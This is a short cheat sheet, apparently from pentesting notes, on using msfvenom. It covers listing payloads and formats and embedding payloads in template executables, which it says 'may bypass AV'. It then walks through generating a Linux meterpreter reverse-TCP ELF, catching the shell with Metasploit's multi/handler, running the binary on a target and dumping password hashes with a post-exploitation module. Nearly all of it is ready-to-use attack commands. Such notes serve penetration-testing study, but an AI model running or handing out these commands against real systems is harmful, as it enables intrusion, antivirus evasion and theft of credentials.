Msfvenom
Help menu
$ msfvenom -hList available options for module type
$ msfvenom -l payloads
$ msfvenom -l encoders
$ msfvenom -l nops
$ msfvenom -l allPayload option
$ msfvenom -p ...
# eg.
$ msfvenom -p linux/x86/shell_reverse_tcpFormat option
$ msfvenom -f ...
# eg.
$ msfvenom -f elf
$ msfvenom -f exe
Note: The output from msfvenom provides the shellcode (typically raw machine code) that can be executed on the target architecture, and is defined by the -p flag. The -f flag simply specifies the format for which the shellcode should be in.
Eg. Powershell
[Byte[]] $buf = 0xfc,0x48,0x83,...
Eg. C
unsigned char buf[] = "\xfc\x48\x83...
Eg. Python
buf = b""
buf += b"\xfc\x48\x8
buf += b"\...
Template
$ msfvenom -x ...
$ msfvenom --template ...can be used to specify a custom executable file to be used as template
this means that the original functionality of the provided executable file will be fulfilled, but with the addition of the payload specified by an attacker
may bypass AV, etc.
Example
linux/x86/meterpreter/reverse_tcp
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.xxx.xxx LPORT=8000 -f elf > shell.elfModule to use on the attacking machine to catch a shell
exploit/multi/handler
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx
msf6 exploit(multi/handler) > set lport xxxx
msf6 exploit(multi/handler) > runRun the shellcode on the target machine
# eg.
$ sudo ./shell.elfGain meterpreter shell on the attacker machine
meterpreter >Using post exploitation hash dump module
meterpreter > background
msf6 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux ... ...
msf6 exploit(multi/handler) > use post/linux/gather/hashdump
msf6 post(linux/gather/hashdump) > show options
msf6 post(linux/gather/hashdump) > set session 1
msf6 post(linux/gather/hashdump) > run
...Last updated